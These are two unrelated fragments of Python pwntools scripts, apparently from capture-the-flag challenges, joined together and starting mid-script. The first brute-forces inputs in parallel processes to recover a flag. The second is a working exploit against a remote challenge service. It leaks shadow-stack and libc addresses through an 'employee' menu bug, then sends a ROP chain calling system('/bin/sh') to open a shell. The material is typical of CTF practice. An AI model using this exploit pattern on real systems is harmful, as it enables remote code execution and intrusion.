p.sendline(str(input)) output = p.recvall().decode('ascii') flag = output.split('Unlocked secret is:')[1].strip() if not flag.startswith("H"): output_file.write(f"Error: Invalid flag {flag} for input {input}\n") output_file.write(f"{flag} for {input}\n") if "HV20" in flag: print(flag + " " + pid) exit(0) count += 1 if count % 100 == 0: print(f"HV PID {pid} has {count}/{len(search)}") search = list(elf.search(assembly_for_h)) a, b, c, d = array_split(search, 4) p1 = Process(target=lambda: brute_force_range(a, "1")) p2 = Process(target=lambda: brute_force_range(b, "2")) p3 = Process(target=lambda: brute_force_range(c, "3")) p4 = Process(target=lambda: brute_force_range(d, "4")) p1.start() p2.start() p3.start() p4.start()
p = remote("challenges.ctf.kaf.sh", 8000) #p = process('./shadowstuck', env={"LD_PRELOAD":"./libc-2.31.so"}) libc = ELF('./libc-2.31.so') base_shadowstack = int(p.recvline().split(b'at ')[1][:-1], 16) print("[+] Shadowstack @ 0x%x" % base_shadowstack) add_employee("Mike") #0 fire_employee("Mike", b'a' * 0x10 + pack(base_shadowstack)[:-2]) leak = unpack(read_employee(1).ljust(8, b'\x00')) print("[+] Leak libc @ 0x%x" % leak) libc.address = leak - 159923 print("[+] Libc @ 0x%x" % libc.address) pop_rdi_gadget = libc.address + 0x26b72 change_employee(1, pack(pop_rdi_gadget).rstrip(b'\x00')) assert unpack(read_employee(1).ljust(8, b'\x00')) == pop_rdi_gadget rop = b"aaaaaaaaaaaaaaaaaaaaaaaaa" #padding rop += pack(pop_rdi_gadget) rop += pack(next(libc.search(b'/bin/sh'))) rop += pack(pop_rdi_gadget + 1) #for stack alignment rop += pack(libc.symbols['system']) employee_exit(rop) p.interactive()